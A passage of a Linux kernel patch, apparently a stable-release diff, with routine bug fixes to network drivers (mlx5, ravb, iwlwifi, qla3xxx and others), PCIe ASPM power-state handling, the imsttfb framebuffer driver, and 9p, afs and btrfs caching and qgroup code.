++		       PF_CGXMAP_BASE;
++
+ 	for (i = PF_CGXMAP_BASE; i < max_lmac_cnt; i++) {
+ 		if (rvu->pf2cgxlmac_map[i] == 0xFF)
+ 			continue;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+index d136360ac6a98..a6d3fc96e1685 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+@@ -25,7 +25,7 @@
+ struct mlx5_irq {
+ 	struct atomic_notifier_head nh;
+ 	cpumask_var_t mask;
+-	char name[MLX5_MAX_IRQ_NAME];
++	char name[MLX5_MAX_IRQ_FORMATTED_NAME];
+ 	struct mlx5_irq_pool *pool;
+ 	int refcount;
+ 	u32 index;
+@@ -236,8 +236,8 @@ struct mlx5_irq *mlx5_irq_alloc(struct mlx5_irq_pool *pool, int i,
+ 	else
+ 		irq_sf_set_name(pool, name, i);
+ 	ATOMIC_INIT_NOTIFIER_HEAD(&irq->nh);
+-	snprintf(irq->name, MLX5_MAX_IRQ_NAME,
+-		 "%s@pci:%s", name, pci_name(dev->pdev));
++	snprintf(irq->name, MLX5_MAX_IRQ_FORMATTED_NAME,
++		 MLX5_IRQ_NAME_FORMAT_STR, name, pci_name(dev->pdev));
+ 	err = request_irq(irq->irqn, irq_int_handler, 0, irq->name,
+ 			  &irq->nh);
+ 	if (err) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h
+index 5c7e68bee43a0..4047179307c4a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h
+@@ -7,6 +7,9 @@
+ #include <linux/mlx5/driver.h>
+ 
+ #define MLX5_MAX_IRQ_NAME (32)
++#define MLX5_IRQ_NAME_FORMAT_STR ("%s@pci:%s")
++#define MLX5_MAX_IRQ_FORMATTED_NAME \
++	(MLX5_MAX_IRQ_NAME + sizeof(MLX5_IRQ_NAME_FORMAT_STR))
+ /* max irq_index is 2047, so four chars */
+ #define MLX5_MAX_IRQ_IDX_CHARS (4)
+ #define MLX5_EQ_REFS_PER_IRQ (2)
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index 0d5a41a2ae010..227d01cace3f0 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -267,6 +267,13 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 		priv->stats.rx_truncate_errors++;
+ 	}
+ 
++	/* Read receive consumer index before replenish so that this routine
++	 * returns accurate return value even if packet is received into
++	 * just-replenished buffer prior to exiting this routine.
++	 */
++	rx_ci = readq(priv->base + MLXBF_GIGE_RX_CQE_PACKET_CI);
++	rx_ci_rem = rx_ci % priv->rx_q_entries;
++
+ 	/* Let hardware know we've replenished one buffer */
+ 	rx_pi++;
+ 
+@@ -279,8 +286,6 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 	rx_pi_rem = rx_pi % priv->rx_q_entries;
+ 	if (rx_pi_rem == 0)
+ 		priv->valid_polarity ^= 1;
+-	rx_ci = readq(priv->base + MLXBF_GIGE_RX_CQE_PACKET_CI);
+-	rx_ci_rem = rx_ci % priv->rx_q_entries;
+ 
+ 	if (skb)
+ 		netif_receive_skb(skb);
+diff --git a/drivers/net/ethernet/qlogic/qla3xxx.c b/drivers/net/ethernet/qlogic/qla3xxx.c
+index 0d57ffcedf0c6..fc78bc959ded8 100644
+--- a/drivers/net/ethernet/qlogic/qla3xxx.c
++++ b/drivers/net/ethernet/qlogic/qla3xxx.c
+@@ -2591,6 +2591,7 @@ static int ql_alloc_buffer_queues(struct ql3_adapter *qdev)
+ 
+ 	if (qdev->lrg_buf_q_alloc_virt_addr == NULL) {
+ 		netdev_err(qdev->ndev, "lBufQ failed\n");
++		kfree(qdev->lrg_buf);
+ 		return -ENOMEM;
+ 	}
+ 	qdev->lrg_buf_q_virt_addr = qdev->lrg_buf_q_alloc_virt_addr;
+@@ -2615,6 +2616,7 @@ static int ql_alloc_buffer_queues(struct ql3_adapter *qdev)
+ 				  qdev->lrg_buf_q_alloc_size,
+ 				  qdev->lrg_buf_q_alloc_virt_addr,
+ 				  qdev->lrg_buf_q_alloc_phy_addr);
++		kfree(qdev->lrg_buf);
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index d22457f2cf9cf..06663c11ca96d 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -1145,7 +1145,7 @@ static void rtl8168ep_driver_start(struct rtl8169_private *tp)
+ {
+ 	r8168ep_ocp_write(tp, 0x01, 0x180, OOB_CMD_DRIVER_START);
+ 	r8168ep_ocp_write(tp, 0x01, 0x30, r8168ep_ocp_read(tp, 0x30) | 0x01);
+-	rtl_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 10);
++	rtl_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 30);
+ }
+ 
+ static void rtl8168_driver_start(struct rtl8169_private *tp)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 68cb5616ef991..c2c56a5289caf 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -68,16 +68,27 @@ int ravb_wait(struct net_device *ndev, enum ravb_reg reg, u32 mask, u32 value)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static int ravb_config(struct net_device *ndev)
++static int ravb_set_opmode(struct net_device *ndev, u32 opmode)
+ {
++	u32 csr_ops = 1U << (opmode & CCC_OPC);
++	u32 ccc_mask = CCC_OPC;
+ 	int error;
+ 
+-	/* Set config mode */
+-	ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG);
+-	/* Check if the operating mode is changed to the config mode */
+-	error = ravb_wait(ndev, CSR, CSR_OPS, CSR_OPS_CONFIG);
+-	if (error)
+-		netdev_err(ndev, "failed to switch device to config mode\n");
++	/* If gPTP active in config mode is supported it needs to be configured
++	 * along with CSEL and operating mode in the same access. This is a
++	 * hardware limitation.
++	 */
++	if (opmode & CCC_GAC)
++		ccc_mask |= CCC_GAC | CCC_CSEL;
++
++	/* Set operating mode */
++	ravb_modify(ndev, CCC, ccc_mask, opmode);
++	/* Check if the operating mode is changed to the requested one */
++	error = ravb_wait(ndev, CSR, CSR_OPS, csr_ops);
++	if (error) {
++		netdev_err(ndev, "failed to switch device to requested mode (%u)\n",
++			   opmode & CCC_OPC);
++	}
+ 
+ 	return error;
+ }
+@@ -675,7 +686,7 @@ static int ravb_dmac_init(struct net_device *ndev)
+ 	int error;
+ 
+ 	/* Set CONFIG mode */
+-	error = ravb_config(ndev);
++	error = ravb_set_opmode(ndev, CCC_OPC_CONFIG);
+ 	if (error)
+ 		return error;
+ 
+@@ -684,9 +695,7 @@ static int ravb_dmac_init(struct net_device *ndev)
+ 		return error;
+ 
+ 	/* Setting the control will start the AVB-DMAC process. */
+-	ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_OPERATION);
+-
+-	return 0;
++	return ravb_set_opmode(ndev, CCC_OPC_OPERATION);
+ }
+ 
+ static void ravb_get_tx_tstamp(struct net_device *ndev)
+@@ -1048,7 +1057,7 @@ static int ravb_stop_dma(struct net_device *ndev)
+ 		return error;
+ 
+ 	/* Stop AVB-DMAC process */
+-	return ravb_config(ndev);
++	return ravb_set_opmode(ndev, CCC_OPC_CONFIG);
+ }
+ 
+ /* E-MAC interrupt handler */
+@@ -2576,21 +2585,25 @@ static int ravb_set_gti(struct net_device *ndev)
+ 	return 0;
+ }
+ 
+-static void ravb_set_config_mode(struct net_device *ndev)
++static int ravb_set_config_mode(struct net_device *ndev)
+ {
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 	const struct ravb_hw_info *info = priv->info;
++	int error;
+ 
+ 	if (info->gptp) {
+-		ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG);
++		error = ravb_set_opmode(ndev, CCC_OPC_CONFIG);
++		if (error)
++			return error;
+ 		/* Set CSEL value */
+ 		ravb_modify(ndev, CCC, CCC_CSEL, CCC_CSEL_HPB);
+ 	} else if (info->ccc_gac) {
+-		ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG |
+-			    CCC_GAC | CCC_CSEL_HPB);
++		error = ravb_set_opmode(ndev, CCC_OPC_CONFIG | CCC_GAC | CCC_CSEL_HPB);
+ 	} else {
+-		ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG);
++		error = ravb_set_opmode(ndev, CCC_OPC_CONFIG);
+ 	}
++
++	return error;
+ }
+ 
+ /* Set tx and rx clock internal delay modes */
+@@ -2810,7 +2823,9 @@ static int ravb_probe(struct platform_device *pdev)
+ 	ndev->ethtool_ops = &ravb_ethtool_ops;
+ 
+ 	/* Set AVB config mode */
+-	ravb_set_config_mode(ndev);
++	error = ravb_set_config_mode(ndev);
++	if (error)
++		goto out_disable_gptp_clk;
+ 
+ 	if (info->gptp || info->ccc_gac) {
+ 		/* Set GTI value */
+@@ -2933,8 +2948,7 @@ static int ravb_remove(struct platform_device *pdev)
+ 	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
+ 			  priv->desc_bat_dma);
+ 
+-	/* Set reset mode */
+-	ravb_write(ndev, CCC_OPC_RESET, CCC);
++	ravb_set_opmode(ndev, CCC_OPC_RESET);
+ 
+ 	clk_disable_unprepare(priv->gptp_clk);
+ 	clk_disable_unprepare(priv->refclk);
+@@ -3018,8 +3032,11 @@ static int __maybe_unused ravb_resume(struct device *dev)
+ 	int ret = 0;
+ 
+ 	/* If WoL is enabled set reset mode to rearm the WoL logic */
+-	if (priv->wol_enabled)
+-		ravb_write(ndev, CCC_OPC_RESET, CCC);
++	if (priv->wol_enabled) {
++		ret = ravb_set_opmode(ndev, CCC_OPC_RESET);
++		if (ret)
++			return ret;
++	}
+ 
+ 	/* All register have been reset to default values.
+ 	 * Restore all registers which where setup at probe time and
+@@ -3027,7 +3044,9 @@ static int __maybe_unused ravb_resume(struct device *dev)
+ 	 */
+ 
+ 	/* Set AVB config mode */
+-	ravb_set_config_mode(ndev);
++	ret = ravb_set_config_mode(ndev);
++	if (ret)
++		return ret;
+ 
+ 	if (info->gptp || info->ccc_gac) {
+ 		/* Set GTI value */
+diff --git a/drivers/net/ethernet/sfc/rx_common.c b/drivers/net/ethernet/sfc/rx_common.c
+index 9220afeddee81..3f290791df1c4 100644
+--- a/drivers/net/ethernet/sfc/rx_common.c
++++ b/drivers/net/ethernet/sfc/rx_common.c
+@@ -820,8 +820,10 @@ int efx_probe_filters(struct efx_nic *efx)
+ 		}
+ 
+ 		if (!success) {
+-			efx_for_each_channel(channel, efx)
++			efx_for_each_channel(channel, efx) {
+ 				kfree(channel->rps_flow_id);
++				channel->rps_flow_id = NULL;
++			}
+ 			efx->type->filter_table_remove(efx);
+ 			rc = -ENOMEM;
+ 			goto out_unlock;
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 477b4d4f860bd..bace989591f75 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -629,7 +629,7 @@ static void __gtp_encap_destroy(struct sock *sk)
+ 			gtp->sk0 = NULL;
+ 		else
+ 			gtp->sk1u = NULL;
+-		udp_sk(sk)->encap_type = 0;
++		WRITE_ONCE(udp_sk(sk)->encap_type, 0);
+ 		rcu_assign_sk_user_data(sk, NULL);
+ 		release_sock(sk);
+ 		sock_put(sk);
+@@ -681,7 +681,7 @@ static int gtp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 
+ 	netdev_dbg(gtp->dev, "encap_recv sk=%p\n", sk);
+ 
+-	switch (udp_sk(sk)->encap_type) {
++	switch (READ_ONCE(udp_sk(sk)->encap_type)) {
+ 	case UDP_ENCAP_GTP0:
+ 		netdev_dbg(gtp->dev, "received GTP0 packet\n");
+ 		ret = gtp0_udp_encap_recv(gtp, skb);
+diff --git a/drivers/net/usb/ax88172a.c b/drivers/net/usb/ax88172a.c
+index 3777c7e2e6fc0..e47bb125048d4 100644
+--- a/drivers/net/usb/ax88172a.c
++++ b/drivers/net/usb/ax88172a.c
+@@ -161,7 +161,9 @@ static int ax88172a_bind(struct usbnet *dev, struct usb_interface *intf)
+ 	u8 buf[ETH_ALEN];
+ 	struct ax88172a_private *priv;
+ 
+-	usbnet_get_endpoints(dev, intf);
++	ret = usbnet_get_endpoints(dev, intf);
++	if (ret)
++		return ret;
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-prph.h b/drivers/net/wireless/intel/iwlwifi/iwl-prph.h
+index 157d1f31c4871..c5a306b01fe20 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-prph.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-prph.h
+@@ -348,8 +348,8 @@
+ #define RFIC_REG_RD			0xAD0470
+ #define WFPM_CTRL_REG			0xA03030
+ #define WFPM_OTP_CFG1_ADDR		0x00a03098
+-#define WFPM_OTP_CFG1_IS_JACKET_BIT	BIT(4)
+-#define WFPM_OTP_CFG1_IS_CDB_BIT	BIT(5)
++#define WFPM_OTP_CFG1_IS_JACKET_BIT	BIT(5)
++#define WFPM_OTP_CFG1_IS_CDB_BIT	BIT(4)
+ 
+ #define WFPM_GP2			0xA030B4
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+index 69b95ad5993b0..2ec4ee8ab317c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+@@ -745,7 +745,7 @@ static inline void iwl_enable_rfkill_int(struct iwl_trans *trans)
+ 	}
+ }
+ 
+-void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans);
++void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans, bool from_irq);
+ 
+ static inline bool iwl_is_rfkill_set(struct iwl_trans *trans)
+ {
+@@ -792,7 +792,7 @@ static inline bool iwl_pcie_dbg_on(struct iwl_trans *trans)
+ 	return (trans->dbg.dest_tlv || iwl_trans_dbg_ini_valid(trans));
+ }
+ 
+-void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state);
++void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state, bool from_irq);
+ void iwl_trans_pcie_dump_regs(struct iwl_trans *trans);
+ 
+ #ifdef CONFIG_IWLWIFI_DEBUGFS
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index 90a46faaaffdf..57a11ee05bc36 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1781,7 +1781,7 @@ static u32 iwl_pcie_int_cause_ict(struct iwl_trans *trans)
+ 	return inta;
+ }
+ 
+-void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans)
++void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans, bool from_irq)
+ {
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 	struct isr_statistics *isr_stats = &trans_pcie->isr_stats;
+@@ -1805,7 +1805,7 @@ void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans)
+ 	isr_stats->rfkill++;
+ 
+ 	if (prev != report)
+-		iwl_trans_pcie_rf_kill(trans, report);
++		iwl_trans_pcie_rf_kill(trans, report, from_irq);
+ 	mutex_unlock(&trans_pcie->mutex);
+ 
+ 	if (hw_rfkill) {
+@@ -1945,7 +1945,7 @@ irqreturn_t iwl_pcie_irq_handler(int irq, void *dev_id)
+ 
+ 	/* HW RF KILL switch toggled */
+ 	if (inta & CSR_INT_BIT_RF_KILL) {
+-		iwl_pcie_handle_rfkill_irq(trans);
++		iwl_pcie_handle_rfkill_irq(trans, true);
+ 		handled |= CSR_INT_BIT_RF_KILL;
+ 	}
+ 
+@@ -2362,7 +2362,7 @@ irqreturn_t iwl_pcie_irq_msix_handler(int irq, void *dev_id)
+ 
+ 	/* HW RF KILL switch toggled */
+ 	if (inta_hw & MSIX_HW_INT_CAUSES_REG_RF_KILL)
+-		iwl_pcie_handle_rfkill_irq(trans);
++		iwl_pcie_handle_rfkill_irq(trans, true);
+ 
+ 	if (inta_hw & MSIX_HW_INT_CAUSES_REG_HW_ERR) {
+ 		IWL_ERR(trans,
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 796972f224326..c7ed35b3dd8d5 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -1080,7 +1080,7 @@ bool iwl_pcie_check_hw_rf_kill(struct iwl_trans *trans)
+ 	report = test_bit(STATUS_RFKILL_OPMODE, &trans->status);
+ 
+ 	if (prev != report)
+-		iwl_trans_pcie_rf_kill(trans, report);
++		iwl_trans_pcie_rf_kill(trans, report, false);
+ 
+ 	return hw_rfkill;
+ }
+@@ -1234,7 +1234,7 @@ static void iwl_pcie_init_msix(struct iwl_trans_pcie *trans_pcie)
+ 	trans_pcie->hw_mask = trans_pcie->hw_init_mask;
+ }
+ 
+-static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans)
++static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans, bool from_irq)
+ {
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 
+@@ -1261,7 +1261,8 @@ static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+ 	if (test_and_clear_bit(STATUS_DEVICE_ENABLED, &trans->status)) {
+ 		IWL_DEBUG_INFO(trans,
+ 			       "DEVICE_ENABLED bit was set and is now cleared\n");
+-		iwl_pcie_synchronize_irqs(trans);
++		if (!from_irq)
++			iwl_pcie_synchronize_irqs(trans);
+ 		iwl_pcie_rx_napi_sync(trans);
+ 		iwl_pcie_tx_stop(trans);
+ 		iwl_pcie_rx_stop(trans);
+@@ -1451,7 +1452,7 @@ void iwl_trans_pcie_handle_stop_rfkill(struct iwl_trans *trans,
+ 		clear_bit(STATUS_RFKILL_OPMODE, &trans->status);
+ 	}
+ 	if (hw_rfkill != was_in_rfkill)
+-		iwl_trans_pcie_rf_kill(trans, hw_rfkill);
++		iwl_trans_pcie_rf_kill(trans, hw_rfkill, false);
+ }
+ 
+ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+@@ -1466,12 +1467,12 @@ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+ 	mutex_lock(&trans_pcie->mutex);
+ 	trans_pcie->opmode_down = true;
+ 	was_in_rfkill = test_bit(STATUS_RFKILL_OPMODE, &trans->status);
+-	_iwl_trans_pcie_stop_device(trans);
++	_iwl_trans_pcie_stop_device(trans, false);
+ 	iwl_trans_pcie_handle_stop_rfkill(trans, was_in_rfkill);
+ 	mutex_unlock(&trans_pcie->mutex);
+ }
+ 
+-void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state)
++void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state, bool from_irq)
+ {
+ 	struct iwl_trans_pcie __maybe_unused *trans_pcie =
+ 		IWL_TRANS_GET_PCIE_TRANS(trans);
+@@ -1484,7 +1485,7 @@ void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state)
+ 		if (trans->trans_cfg->gen2)
+ 			_iwl_trans_pcie_gen2_stop_device(trans);
+ 		else
+-			_iwl_trans_pcie_stop_device(trans);
++			_iwl_trans_pcie_stop_device(trans, from_irq);
+ 	}
+ }
+ 
+@@ -2815,7 +2816,7 @@ static ssize_t iwl_dbgfs_rfkill_write(struct file *file,
+ 	IWL_WARN(trans, "changing debug rfkill %d->%d\n",
+ 		 trans_pcie->debug_rfkill, new_value);
+ 	trans_pcie->debug_rfkill = new_value;
+-	iwl_pcie_handle_rfkill_irq(trans);
++	iwl_pcie_handle_rfkill_irq(trans, false);
+ 
+ 	return count;
+ }
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 8df156c28aade..5368a37154cf9 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1302,6 +1302,9 @@ static int pci_set_full_power_state(struct pci_dev *dev)
+ 		pci_restore_bars(dev);
+ 	}
+ 
++	if (dev->bus->self)
++		pcie_aspm_pm_state_change(dev->bus->self);
++
+ 	return 0;
+ }
+ 
+@@ -1396,6 +1399,9 @@ static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state)
+ 				     pci_power_name(dev->current_state),
+ 				     pci_power_name(state));
+ 
++	if (dev->bus->self)
++		pcie_aspm_pm_state_change(dev->bus->self);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index ffccb03933e27..ed6d75d138c7a 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -561,10 +561,12 @@ bool pcie_wait_for_link(struct pci_dev *pdev, bool active);
+ #ifdef CONFIG_PCIEASPM
+ void pcie_aspm_init_link_state(struct pci_dev *pdev);
+ void pcie_aspm_exit_link_state(struct pci_dev *pdev);
++void pcie_aspm_pm_state_change(struct pci_dev *pdev);
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev);
+ #else
+ static inline void pcie_aspm_init_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_exit_link_state(struct pci_dev *pdev) { }
++static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_powersave_config_link(struct pci_dev *pdev) { }
+ #endif
+ 
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 5d1756f53ba84..25736d408e88e 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -1055,6 +1055,25 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 	up_read(&pci_bus_sem);
+ }
+ 
++/* @pdev: the root port or switch downstream port */
++void pcie_aspm_pm_state_change(struct pci_dev *pdev)
++{
++	struct pcie_link_state *link = pdev->link_state;
++
++	if (aspm_disabled || !link)
++		return;
++	/*
++	 * Devices changed PM state, we should recheck if latency
++	 * meets all functions' requirement
++	 */
++	down_read(&pci_bus_sem);
++	mutex_lock(&aspm_lock);
++	pcie_update_aspm_capable(link->root);
++	pcie_config_aspm_path(link);
++	mutex_unlock(&aspm_lock);
++	up_read(&pci_bus_sem);
++}
++
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev)
+ {
+ 	struct pcie_link_state *link = pdev->link_state;
+diff --git a/drivers/video/fbdev/imsttfb.c b/drivers/video/fbdev/imsttfb.c
+index b194e71f07bfc..aa51cb72cbba5 100644
+--- a/drivers/video/fbdev/imsttfb.c
++++ b/drivers/video/fbdev/imsttfb.c
+@@ -1419,7 +1419,6 @@ static int init_imstt(struct fb_info *info)
+ 	if ((info->var.xres * info->var.yres) * (info->var.bits_per_pixel >> 3) > info->fix.smem_len
+ 	    || !(compute_imstt_regvals(par, info->var.xres, info->var.yres))) {
+ 		printk("imsttfb: %ux%ux%u not supported\n", info->var.xres, info->var.yres, info->var.bits_per_pixel);
+-		framebuffer_release(info);
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1452,10 +1451,11 @@ static int init_imstt(struct fb_info *info)
+ 	              FBINFO_HWACCEL_FILLRECT |
+ 	              FBINFO_HWACCEL_YPAN;
+ 
+-	fb_alloc_cmap(&info->cmap, 0, 0);
++	if (fb_alloc_cmap(&info->cmap, 0, 0))
++		return -ENODEV;
+ 
+ 	if (register_framebuffer(info) < 0) {
+-		framebuffer_release(info);
++		fb_dealloc_cmap(&info->cmap);
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/fs/9p/cache.c b/fs/9p/cache.c
+index cebba4eaa0b57..12c0ae29f1857 100644
+--- a/fs/9p/cache.c
++++ b/fs/9p/cache.c
+@@ -68,6 +68,8 @@ void v9fs_cache_inode_get_cookie(struct inode *inode)
+ 				       &path, sizeof(path),
+ 				       &version, sizeof(version),
+ 				       i_size_read(&v9inode->netfs.inode));
++	if (v9inode->netfs.cache)
++		mapping_set_release_always(inode->i_mapping);
+ 
+ 	p9_debug(P9_DEBUG_FSC, "inode %p get cookie %p\n",
+ 		 inode, v9fs_inode_cookie(v9inode));
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index fcbb598d8c85d..a25fdc3e52310 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -682,6 +682,8 @@ static inline void afs_vnode_set_cache(struct afs_vnode *vnode,
+ {
+ #ifdef CONFIG_AFS_FSCACHE
+ 	vnode->netfs.cache = cookie;
++	if (cookie)
++		mapping_set_release_always(vnode->netfs.inode.i_mapping);
+ #endif
+ }
+ 
+diff --git a/fs/btrfs/delalloc-space.c b/fs/btrfs/delalloc-space.c
+index 0b62ce77053f5..f2bc5563c0f92 100644
+--- a/fs/btrfs/delalloc-space.c
++++ b/fs/btrfs/delalloc-space.c
+@@ -197,7 +197,7 @@ void btrfs_free_reserved_data_space(struct btrfs_inode *inode,
+ 	start = round_down(start, fs_info->sectorsize);
+ 
+ 	btrfs_free_reserved_data_space_noquota(fs_info, len);
+-	btrfs_qgroup_free_data(inode, reserved, start, len);
++	btrfs_qgroup_free_data(inode, reserved, start, len, NULL);
+ }
+ 
+ /**
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index b14d2da9b26d3..14478da875313 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -602,7 +602,7 @@ int btrfs_lookup_csums_range(struct btrfs_root *root, u64 start, u64 end,
+ 			}
+ 
+ 			sums->bytenr = start;
+-			sums->len = (int)size;
++			sums->len = size;
+ 
+ 			offset = (start - key.offset) >> fs_info->sectorsize_bits;
+ 			offset *= csum_size;
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 0a46fff3dd067..1783a0fbf1665 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3191,7 +3191,7 @@ static long btrfs_fallocate(struct file *file, int mode,
+ 			qgroup_reserved -= range->len;
+ 		} else if (qgroup_reserved > 0) {
+ 			btrfs_qgroup_free_data(BTRFS_I(inode), data_reserved,
+-					       range->start, range->len);
++					       range->start, range->len, NULL);
+ 			qgroup_reserved -= range->len;
+ 		}
+ 		list_del(&range->list);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 81eac121c6b23..9a7d77c410e22 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -466,7 +466,7 @@ out:
+ 	 * And at reserve time, it's always aligned to page size, so
+ 	 * just free one page here.
+ 	 */
+-	btrfs_qgroup_free_data(inode, NULL, 0, PAGE_SIZE);
++	btrfs_qgroup_free_data(inode, NULL, 0, PAGE_SIZE, NULL);
+ 	btrfs_free_path(path);
+ 	btrfs_end_transaction(trans);
+ 	return ret;
+@@ -5372,7 +5372,7 @@ static void evict_inode_truncate_pages(struct inode *inode)
+ 		 */
+ 		if (state_flags & EXTENT_DELALLOC)
+ 			btrfs_qgroup_free_data(BTRFS_I(inode), NULL, start,
+-					       end - start + 1);
++					       end - start + 1, NULL);
+ 
+ 		clear_extent_bit(io_tree, start, end,
+ 				 EXTENT_CLEAR_ALL_BITS | EXTENT_DO_ACCOUNTING,
+@@ -8440,7 +8440,7 @@ next:
+ 		 *    reserved data space.
+ 		 *    Since the IO will never happen for this page.
+ 		 */
+-		btrfs_qgroup_free_data(inode, NULL, cur, range_end + 1 - cur);
++		btrfs_qgroup_free_data(inode, NULL, cur, range_end + 1 - cur, NULL);
+ 		if (!inode_evicting) {
+ 			clear_extent_bit(tree, cur, range_end, EXTENT_LOCKED |
+ 				 EXTENT_DELALLOC | EXTENT_UPTODATE |
+@@ -9902,7 +9902,7 @@ static struct btrfs_trans_handle *insert_prealloc_file_extent(
+ 	struct btrfs_path *path;
+ 	u64 start = ins->objectid;
+ 	u64 len = ins->offset;
+-	int qgroup_released;
++	u64 qgroup_released = 0;
+ 	int ret;
+ 
+ 	memset(&stack_fi, 0, sizeof(stack_fi));
+@@ -9915,9 +9915,9 @@ static struct btrfs_trans_handle *insert_prealloc_file_extent(
+ 	btrfs_set_stack_file_extent_compression(&stack_fi, BTRFS_COMPRESS_NONE);
+ 	/* Encryption and other encoding is reserved and all 0 */
+ 
+-	qgroup_released = btrfs_qgroup_release_data(inode, file_offset, len);
+-	if (qgroup_released < 0)
+-		return ERR_PTR(qgroup_released);
++	ret = btrfs_qgroup_release_data(inode, file_offset, len, &qgroup_released);
++	if (ret < 0)
++		return ERR_PTR(ret);
+ 
+ 	if (trans) {
+ 		ret = insert_reserved_file_extent(trans, inode,
+@@ -10903,7 +10903,7 @@ out_delalloc_release:
